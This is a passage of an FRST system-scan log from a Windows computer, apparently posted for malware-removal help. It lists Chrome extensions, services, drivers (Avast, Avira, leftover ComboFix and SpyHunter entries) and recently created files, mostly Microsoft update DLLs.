CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-06-18]
CHR Extension: (Skype Click to Call) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-05-19]
CHR Extension: (Google Wallet) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-05-19]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-01]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-01]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-03-01]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-03-01]
CHR Extension: (Google Search) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-13]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-01]
CHR Extension: (Avast Online Security) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\gomekmidlodglbbmalcneegieacbdmki [2015-04-13]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-04-13]
CHR Extension: (Skype Click to Call) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-04-13]
CHR Extension: (Google Wallet) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-04-13]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-01-13]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2011-10-10]
StartMenuInternet: Google Chrome - C:\Users\Owner\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [226440 2016-01-13] (AVAST Software)
R2 DMAgent; C:\Program Files\Intel\WiMAX\Bin\DMAgent.exe [606720 2010-09-28] (Red Bend Ltd.) [File not signed]
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2009-06-09] (Stardock Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [340240 2010-03-05] ()
R2 vToolbarUpdater18.1.7; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.7\ToolbarUpdater.exe [1808408 2014-06-11] (AVG Secure Search)
R2 WiMAXAppSrv; C:\Program Files\Intel\WiMAX\Bin\AppSrv.exe [911872 2010-09-28] (Intel® Corporation) [File not signed]
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
S2 AntiVirSchedulerService; "C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe" [X]
S2 AntiVirService; "C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe" [X]
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [28656 2016-01-13] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [97648 2016-01-13] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93528 2016-01-13] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65224 2016-01-13] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1065208 2016-01-27] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [464256 2016-01-27] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [155304 2016-01-13] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [273784 2016-01-13] (AVAST Software)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-17] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-17] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-11-25] (Avira Operations GmbH & Co. KG)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2012-12-13] (Apple, Inc.) [File not signed]
S3 BTCFilterService; system32\DRIVERS\motfilt.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 motandroidusb; System32\Drivers\motoandroid.sys [X]
S3 motccgp; system32\DRIVERS\motccgp.sys [X]
S3 motccgpfl; system32\DRIVERS\motccgpfl.sys [X]
S3 motmodem; system32\DRIVERS\motmodem.sys [X]
S3 MotoSwitchService; system32\DRIVERS\motswch.sys [X]
S3 Motousbnet; system32\DRIVERS\Motousbnet.sys [X]
S3 motusbdevice; system32\DRIVERS\motusbdevice.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-02-03 00:56 - 2016-02-03 01:01 - 00030954 _____ C:\Users\Owner\Desktop\FRST.txt
2016-02-03 00:53 - 2016-02-03 00:53 - 02370560 _____ (Farbar) C:\Users\Owner\Desktop\FRST64.exe
2016-02-01 00:22 - 2016-02-01 00:22 - 00320918 _____ C:\Users\Owner\Documents\Erin Hiraide PDF.pdf
2016-01-31 20:19 - 2016-01-31 20:19 - 00000000 ____D C:\Users\Owner\AppData\Roaming\{90140011-0066-0409-0000-0000000FF1CE}
2016-01-31 20:18 - 2016-01-31 20:18 - 00000000 ____D C:\ProgramData\Virtualized Applications
2016-01-31 19:36 - 2016-02-02 03:36 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-30 03:58 - 2016-01-30 03:58 - 00003104 _____ C:\Windows\System32\Tasks\{BFAD41C2-E97A-4707-860A-5AB2C7A44E25}
2016-01-30 03:58 - 2016-01-30 03:58 - 00003104 _____ C:\Windows\System32\Tasks\{170FABC1-475D-499D-BDAD-325B117E8ECE}
2016-01-27 21:22 - 2016-01-27 21:22 - 52988120 _____ (Microsoft Corporation) C:\Users\Owner\Desktop\Windows-KB890830-x64-V5.32.exe
2016-01-27 17:32 - 2015-12-11 10:57 - 01164800 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-01-27 17:32 - 2015-12-08 13:54 - 02285056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2016-01-27 17:32 - 2015-12-08 13:54 - 01620992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 01568768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 01325056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00902144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00815616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00740352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmpmde.dll
2016-01-27 17:32 - 2015-12-08 13:54 - 00739328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00541184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00358400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-01-27 17:32 - 2015-12-08 13:54 - 00154112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 03209728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00970240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00829952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPEG2ENC.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00609280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00509952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00206848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qasf.dll
2016-01-27 17:32 - 2015-12-08 13:53 - 00193536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-01-27 17:32 - 2015-12-08 13:53 - 00153600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-01-27 17:32 - 2015-12-08 13:53 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01955328 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01888768 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01575424 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01573888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01307136 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01232896 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01160192 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01153024 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 01026048 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\mcmde.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00978944 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00666112 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00653824 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00642048 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00632320 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00624640 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00484864 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00447488 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00378880 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00292352 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00254464 _____ (Microsoft Corporation) C:\Windows\system32\qasf.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00225792 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00224768 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00223744 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00189952 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-01-27 17:32 - 2015-12-08 11:07 - 00076288 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-01-27 17:32 - 2015-12-08 11:07 - 00070144 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-01-27 17:32 - 2015-12-08 11:06 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-01-27 17:32 - 2015-11-13 15:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2016-01-27 17:32 - 2015-11-13 15:09 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2016-01-27 17:32 - 2015-11-13 15:08 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\fixmapi.exe
2016-01-27 17:32 - 2015-11-13 14:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapistub.dll
2016-01-27 17:32 - 2015-11-13 14:50 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mapi32.dll
2016-01-27 17:32 - 2015-11-13 14:49 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
2016-01-27 17:31 - 2015-12-23 15:13 - 00387784 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-01-27 17:31 - 2015-12-23 14:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-01-27 17:31 - 2015-12-12 10:31 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-01-27 17:31 - 2015-12-12 10:30 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2016-01-27 17:31 - 2015-12-12 10:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2016-01-27 17:31 - 2015-12-12 10:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-01-27 17:31 - 2015-12-12 10:15 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-01-27 17:31 - 2015-12-12 10:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2016-01-27 17:31 - 2015-12-12 10:07 - 06051328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-01-27 17:31 - 2015-12-12 10:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-01-27 17:31 - 2015-12-12 10:07 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2016-01-27 17:31 - 2015-12-12 10:03 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 20367360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2016-01-27 17:31 - 2015-12-12 10:02 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-01-27 17:31 - 2015-12-12 10:02 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2016-01-27 17:31 - 2015-12-12 09:55 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2016-01-27 17:31 - 2015-12-12 09:51 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-01-27 17:31 - 2015-12-12 09:49 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-01-27 17:31 - 2015-12-12 09:44 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2016-01-27 17:31 - 2015-12-12 09:39 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2016-01-27 17:31 - 2015-12-12 09:37 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2016-01-27 17:31 - 2015-12-12 09:36 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-01-27 17:31 - 2015-12-12 09:36 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2016-01-27 17:31 - 2015-12-12 09:35 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2016-01-27 17:31 - 2015-12-12 09:33 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-01-27 17:31 - 2015-12-12 09:31 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-01-27 17:31 - 2015-12-12 09:30 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2016-01-27 17:31 - 2015-12-12 09:28 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-01-27 17:31 - 2015-12-12 09:27 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-01-27 17:31 - 2015-12-12 09:27 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2016-01-27 17:31 - 2015-12-12 09:27 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-01-27 17:31 - 2015-12-12 09:25 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-01-27 17:31 - 2015-12-12 09:23 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-01-27 17:31 - 2015-12-12 09:22 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-01-27 17:31 - 2015-12-12 09:21 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2016-01-27 17:31 - 2015-12-12 09:20 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-01-27 17:31 - 2015-12-12 09:19 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-01-27 17:31 - 2015-12-12 09:18 - 14457856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-01-27 17:31 - 2015-12-12 09:14 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2016-01-27 17:31 - 2015-12-12 09:12 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2016-01-27 17:31 - 2015-12-12 09:10 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-01-27 17:31 - 2015-12-12 09:10 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-01-27 17:31 - 2015-12-12 09:09 - 04610560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-01-27 17:31 - 2015-12-12 09:08 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2016-01-27 17:31 - 2015-12-12 09:06 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-01-27 17:31 - 2015-12-12 09:02 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-01-27 17:31 - 2015-12-12 09:00 - 12856320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-01-27 17:31 - 2015-12-12 09:00 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-01-27 17:31 - 2015-12-12 09:00 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2016-01-27 17:31 - 2015-12-12 09:00 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-01-27 17:31 - 2015-12-12 08:54 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-01-27 17:31 - 2015-12-12 08:42 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-01-27 17:31 - 2015-12-12 08:41 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-01-27 17:31 - 2015-12-12 08:38 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-01-27 17:31 - 2015-12-12 08:36 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-01-27 17:31 - 2015-12-08 13:53 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-01-27 17:31 - 2015-12-08 13:53 - 00079872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-01-27 17:31 - 2015-12-08 13:53 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-01-27 17:31 - 2015-12-08 13:53 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2016-01-27 17:31 - 2015-12-08 13:53 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2016-01-27 17:31 - 2015-12-08 13:53 - 00004608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksuser.dll
2016-01-27 17:31 - 2015-12-08 13:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2016-01-27 17:31 - 2015-12-08 11:07 - 02777088 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2016-01-27 17:31 - 2015-12-08 11:07 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-01-27 17:31 - 2015-12-08 11:07 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2016-01-27 17:31 - 2015-12-08 11:07 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\ksuser.dll
2016-01-27 17:31 - 2015-12-08 11:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2016-01-27 17:31 - 2015-12-08 11:04 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2016-01-27 17:31 - 2015-12-08 10:54 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2016-01-27 17:31 - 2015-12-08 10:12 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2016-01-27 17:31 - 2015-12-08 10:11 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmkaud.sys
2016-01-27 17:31 - 2015-12-08 09:58 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-01-27 17:30 - 2015-12-12 10:54 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-01-27 17:30 - 2015-12-12 10:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-01-27 17:30 - 2015-12-12 10:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2016-01-27 17:30 - 2015-12-12 09:40 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2016-01-27 17:28 - 2015-12-08 13:53 - 00641536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-01-27 17:28 - 2015-12-08 13:52 - 00312320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-01-27 17:28 - 2015-12-08 11:07 - 00879104 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-01-27 17:28 - 2015-12-08 11:07 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-01-27 17:28 - 2015-11-16 17:11 - 00025024 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-01-27 17:28 - 2015-11-16 17:08 - 01381376 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00705536 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00505856 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-01-27 17:28 - 2015-11-16 17:08 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-01-27 17:28 - 2015-11-16 12:17 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-01-27 17:27 - 2015-12-30 11:08 - 05572544 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-01-27 17:27 - 2015-12-30 11:08 - 00154560 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-01-27 17:27 - 2015-12-30 11:08 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-01-27 17:27 - 2015-12-30 11:05 - 01730496 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-01-27 17:27 - 2015-12-30 11:02 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
